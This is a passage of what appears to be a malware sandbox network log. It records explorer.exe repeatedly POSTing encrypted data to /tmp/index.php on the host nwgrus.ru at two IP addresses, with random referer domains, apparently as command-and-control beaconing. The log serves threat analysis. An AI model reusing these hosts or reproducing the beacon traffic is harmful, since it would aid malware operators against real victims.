Oct 12, 2024 20:08:18.140367031 CEST	186	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 25 48 ca ae Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu%H)ldzD?!XLnn#`@Xs3*[=[]OUe_42F
Oct 12, 2024 20:08:19.640125990 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50010	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:19.650695086 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vltcfypculmuiq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 156 Host: nwgrus.ru
Oct 12, 2024 20:08:19.650719881 CEST	156	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 62 5c c4 86 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vub\'w]g>eY5>0UTvHJ%$BZl([rL'F
Oct 12, 2024 20:08:21.135768890 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50011	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:21.144534111 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://emfnibhwebsi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: nwgrus.ru
Oct 12, 2024 20:08:21.144654989 CEST	267	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 61 0a eb e9 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuaK2QWWml$DFfC[hS:&\>#H{G\Z,.Of7`[e^l}'=D7g N@faTxfGF
Oct 12, 2024 20:08:22.612827063 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50012	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:22.624696970 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sawtavgcrgnnv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 305 Host: nwgrus.ru
Oct 12, 2024 20:08:22.624831915 CEST	305	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 56 40 e2 8f Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuV@^ E\|:spA~Du6w_R[@Y]>()_ #1i8M8g\l{wq4n^},ko,X]oCf(.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50013	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:23.959450006 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ttpnojrymdictnko.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: nwgrus.ru
Oct 12, 2024 20:08:23.959471941 CEST	261	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 34 2f ee a4 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[+k,vu4/mSE_TRtgNB2zKQ:F9E]Kj_9}sD]D{YVbb^##JYhVwZHt6oefJm
Oct 12, 2024 20:08:25.476564884 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50014	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:09:32.651304007 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sdiwjkiticrn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: nwgrus.ru
Oct 12, 2024 20:09:32.651304007 CEST	319	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 40 d9 9e Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vu]@B:dSyyu][uX#w/K%n1YSEU9LDj-a6\7[l4DBU\|j@k S U
Oct 12, 2024 20:09:34.491059065 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 12, 2024 20:09:34.491380930 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50015	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:09:38.300371885 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uedxkfpodrvnuu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 236 Host: nwgrus.ru
Oct 12, 2024 20:09:38.300395012 CEST	236	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 4e b7 ad Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuyNtQoslY aO6Ff3K\[8SP +b;A3F$Xo.B3C[vqDs\O,b
Oct 12, 2024 20:09:39.836384058 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 12, 2024 20:09:40.892951012 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 12, 2024 20:09:40.893574953 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50016	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:09:43.706906080 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jmiqpftbbfl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: nwgrus.ru
Oct 12, 2024 20:09:43.706906080 CEST	359	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 53 a2 9b Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuCSM<j~TjwM)<lCo@{IS]1v"*n@XE.o<rD@s0b`zkR-]6(QcpR.plP?q
Oct 12, 2024 20:09:45.206844091 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50017	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:09:49.811738968 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eguapsteeivf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 368 Host: nwgrus.ru
Oct 12, 2024 20:09:49.811764956 CEST	368	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 56 e5 aa Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vu5VY/c+MYt5c^F^?>>#]$"+M0'NP[]9LG-x3vgMCkPBRx
Oct 12, 2024 20:09:51.303992987 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50018	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:09:55.730739117 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jmyhnxbsgfyxxpwc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 333 Host: nwgrus.ru
Oct 12, 2024 20:09:55.730772018 CEST	333	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 23 bc 92 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuc#z'AQ\|}>FP6"Qs;l]TWMd78LASxb7+&vVza#Ri<fBW{+b)Ii*Ii
Oct 12, 2024 20:09:57.202977896 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:09:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	60089	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:05.624172926 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://olbmmmarqkp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: nwgrus.ru
Oct 12, 2024 20:10:05.624182940 CEST	123	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 49 f3 f2 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vu\I(NrXV[M{l}-4
Oct 12, 2024 20:10:07.063302040 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	60090	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:10.432107925 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hhxlvwfcbrqijpck.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: nwgrus.ru
Oct 12, 2024 20:10:10.432109118 CEST	194	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 40 a5 99 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuA@bhZy=$u)B;`C~5`{l9L,B7\/Ar1<e(*_"TE
Oct 12, 2024 20:10:11.869925022 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	60091	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:16.442836046 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://stpaxqpyogea.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: nwgrus.ru
Oct 12, 2024 20:10:16.442836046 CEST	173	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 15 a2 a1 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuKU!r{Ml"4lYv4GNWsF3D:6e9R(bB34C*Q/
Oct 12, 2024 20:10:17.906589985 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	60092	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:22.254404068 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hvlkumwrcebxfc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: nwgrus.ru
Oct 12, 2024 20:10:22.254436016 CEST	231	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 34 a4 8a Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuX4H5wI<Ey648jqM{>S`VH;2NF{$('.i'-awA\De({`_*
Oct 12, 2024 20:10:23.702090025 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	60093	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:28.957082033 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wuwimcitsicpgplo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: nwgrus.ru
Oct 12, 2024 20:10:28.957132101 CEST	200	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 27 a5 9b Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuH'q+xsr8n `mvCk,fG-^'lQBK1MVP(Pcp71$q]\|A.D.
Oct 12, 2024 20:10:30.352883101 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	60094	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:34.773941040 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iqvctgowbce.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: nwgrus.ru
